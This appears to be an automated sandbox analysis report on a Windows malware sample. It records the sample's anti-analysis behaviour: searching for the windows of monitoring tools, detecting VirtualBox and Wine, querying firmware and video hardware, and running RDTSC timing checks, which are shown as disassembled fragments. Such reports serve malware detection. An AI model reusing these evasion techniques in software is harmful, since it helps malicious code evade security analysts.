                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeCode function: 1_3_008660E8 pushad ; ret 1_3_008660F9
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeCode function: 1_3_008660E8 pushad ; ret 1_3_008660F9
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeCode function: 1_3_008660E8 pushad ; ret 1_3_008660F9
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeCode function: 1_3_008660E8 pushad ; ret 1_3_008660F9
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeCode function: 1_3_008660E8 pushad ; ret 1_3_008660F9
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeCode function: 1_3_008660E8 pushad ; ret 1_3_008660F9
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeCode function: 1_3_008660E8 pushad ; ret 1_3_008660F9
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeCode function: 1_3_008660E8 pushad ; ret 1_3_008660F9
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeCode function: 1_3_008660E8 pushad ; ret 1_3_008660F9
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeCode function: 1_3_008660E8 pushad ; ret 1_3_008660F9
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeCode function: 1_3_008660E8 pushad ; ret 1_3_008660F9
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeCode function: 1_3_008660E8 pushad ; ret 1_3_008660F9
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeCode function: 1_3_008660E8 pushad ; ret 1_3_008660F9
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeCode function: 1_3_008660E8 pushad ; ret 1_3_008660F9
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeCode function: 1_3_008660E8 pushad ; ret 1_3_008660F9
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeCode function: 1_3_008660E8 pushad ; ret 1_3_008660F9
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeCode function: 1_3_008660E8 pushad ; ret 1_3_008660F9
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeCode function: 1_3_008660E8 pushad ; ret 1_3_008660F9
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeCode function: 1_3_008660E8 pushad ; ret 1_3_008660F9
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeCode function: 1_3_008660E8 pushad ; ret 1_3_008660F9
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeCode function: 1_3_008660E8 pushad ; ret 1_3_008660F9
                Source: tTGxYWtjG5.exeStatic PE information: section name: entropy: 7.985601897033366

                Boot Survival

                barindex
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeWindow searched: window name: RegmonClassJump to behavior
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeWindow searched: window name: RegmonclassJump to behavior
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeWindow searched: window name: FilemonclassJump to behavior
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeWindow searched: window name: RegmonclassJump to behavior
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeSystem information queried: FirmwareTableInformationJump to behavior
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: A1958B second address: A195AD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2A913FCE9Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F2A913FCE9Bh 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: A195AD second address: A195B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: A195B1 second address: A18DD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 nop 0x00000008 cld 0x00000009 push dword ptr [ebp+122D13FDh] 0x0000000f pushad 0x00000010 jmp 00007F2A913FCEA5h 0x00000015 mov dword ptr [ebp+122D3876h], edx 0x0000001b popad 0x0000001c call dword ptr [ebp+122D1C94h] 0x00000022 pushad 0x00000023 jmp 00007F2A913FCE9Fh 0x00000028 xor eax, eax 0x0000002a mov dword ptr [ebp+122D1D15h], ebx 0x00000030 stc 0x00000031 mov edx, dword ptr [esp+28h] 0x00000035 mov dword ptr [ebp+122D1D15h], edi 0x0000003b mov dword ptr [ebp+122D3C85h], eax 0x00000041 jmp 00007F2A913FCE9Fh 0x00000046 stc 0x00000047 mov esi, 0000003Ch 0x0000004c jmp 00007F2A913FCEA3h 0x00000051 add esi, dword ptr [esp+24h] 0x00000055 cmc 0x00000056 lodsw 0x00000058 clc 0x00000059 or dword ptr [ebp+122D1D15h], esi 0x0000005f add eax, dword ptr [esp+24h] 0x00000063 pushad 0x00000064 mov dword ptr [ebp+122D22BEh], eax 0x0000006a movzx edi, cx 0x0000006d popad 0x0000006e mov ebx, dword ptr [esp+24h] 0x00000072 clc 0x00000073 nop 0x00000074 pushad 0x00000075 jmp 00007F2A913FCEA3h 0x0000007a push eax 0x0000007b push edx 0x0000007c push eax 0x0000007d push edx 0x0000007e rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: A18DD1 second address: A18DD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: A18DD5 second address: A18DD9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: A18DD9 second address: A18DE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: A18DE7 second address: A18DED instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: B967BF second address: B967C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: B96A8E second address: B96AA6 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F2A913FCE9Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a jns 00007F2A913FCE96h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: B96BED second address: B96BF1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: B96BF1 second address: B96BFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: B96BFD second address: B96C2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jmp 00007F2A9129471Ch 0x0000000a pushad 0x0000000b jmp 00007F2A91294727h 0x00000010 jl 00007F2A91294716h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: B96D66 second address: B96D6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: B96F4A second address: B96F58 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F2A91294716h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: B9ACAC second address: B9AD3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jmp 00007F2A913FCE9Fh 0x0000000a popad 0x0000000b add dword ptr [esp], 439FE4EEh 0x00000012 push 00000003h 0x00000014 push 00000000h 0x00000016 push eax 0x00000017 call 00007F2A913FCE98h 0x0000001c pop eax 0x0000001d mov dword ptr [esp+04h], eax 0x00000021 add dword ptr [esp+04h], 0000001Bh 0x00000029 inc eax 0x0000002a push eax 0x0000002b ret 0x0000002c pop eax 0x0000002d ret 0x0000002e mov dword ptr [ebp+122D1D9Ch], esi 0x00000034 push 00000000h 0x00000036 jmp 00007F2A913FCEA0h 0x0000003b jmp 00007F2A913FCE9Ah 0x00000040 push 00000003h 0x00000042 push 00000000h 0x00000044 push edi 0x00000045 call 00007F2A913FCE98h 0x0000004a pop edi 0x0000004b mov dword ptr [esp+04h], edi 0x0000004f add dword ptr [esp+04h], 0000001Bh 0x00000057 inc edi 0x00000058 push edi 0x00000059 ret 0x0000005a pop edi 0x0000005b ret 0x0000005c push F2E82358h 0x00000061 push eax 0x00000062 push edx 0x00000063 push eax 0x00000064 push edx 0x00000065 pushad 0x00000066 popad 0x00000067 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: B9AD3F second address: B9AD49 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F2A91294716h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: B9AD49 second address: B9AD80 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2A913FCE9Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xor dword ptr [esp], 32E82358h 0x00000010 mov dword ptr [ebp+122D3978h], edx 0x00000016 lea ebx, dword ptr [ebp+12455B7Fh] 0x0000001c add dword ptr [ebp+122D1C6Ah], ebx 0x00000022 push eax 0x00000023 push eax 0x00000024 push edx 0x00000025 jbe 00007F2A913FCE9Ch 0x0000002b push eax 0x0000002c push edx 0x0000002d rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: B9AD80 second address: B9AD84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BBBC52 second address: BBBC66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pushad 0x0000000a push edx 0x0000000b pop edx 0x0000000c jno 00007F2A913FCE96h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BBBC66 second address: BBBC6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BBA0A6 second address: BBA0AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BBA0AC second address: BBA0E5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2A91294724h 0x00000007 jl 00007F2A91294716h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jno 00007F2A91294729h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BBA521 second address: BBA550 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F2A913FCE96h 0x0000000a jmp 00007F2A913FCEA4h 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 ja 00007F2A913FCE9Eh 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BBA550 second address: BBA568 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2A91294724h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BBA568 second address: BBA590 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2A913FCE9Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a jmp 00007F2A913FCEA6h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BBA80F second address: BBA81A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F2A91294716h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BBA9CA second address: BBA9E5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2A913FCEA1h 0x00000007 jnc 00007F2A913FCE96h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BBA9E5 second address: BBA9ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BBA9ED second address: BBAA05 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F2A913FCE9Ch 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f push esi 0x00000010 pop esi 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BBAB78 second address: BBAB8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2A9129471Ah 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BBAB8B second address: BBAB91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BBAB91 second address: BBAB95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BBAB95 second address: BBABBC instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F2A913FCE9Dh 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F2A913FCE9Fh 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BBABBC second address: BBABC0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BBABC0 second address: BBABC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BBABC6 second address: BBABCD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BBABCD second address: BBABD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BAE4D2 second address: BAE4DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BAE4DA second address: BAE4F4 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F2A913FCE96h 0x00000008 jmp 00007F2A913FCE9Dh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: B90781 second address: B9078D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F2A91294716h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: B9078D second address: B90791 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BBB7A1 second address: BBB7D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2A9129471Fh 0x00000009 popad 0x0000000a jmp 00007F2A9129471Dh 0x0000000f push eax 0x00000010 push edx 0x00000011 jl 00007F2A91294716h 0x00000017 jne 00007F2A91294716h 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BBB7D0 second address: BBB7ED instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2A913FCEA9h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BBB7ED second address: BBB80C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 jmp 00007F2A91294722h 0x0000000d push ecx 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BBDFC9 second address: BBDFCE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BBE762 second address: BBE76B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BBFA41 second address: BBFA45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BC6192 second address: BC6196 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BC6196 second address: BC61B9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jg 00007F2A913FCEA2h 0x0000000c pop eax 0x0000000d pushad 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 pushad 0x00000012 popad 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BC61B9 second address: BC61C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jng 00007F2A9129471Eh 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BC5D53 second address: BC5D5B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BC7DF6 second address: BC7DFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BC8081 second address: BC808C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 js 00007F2A913FCE96h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
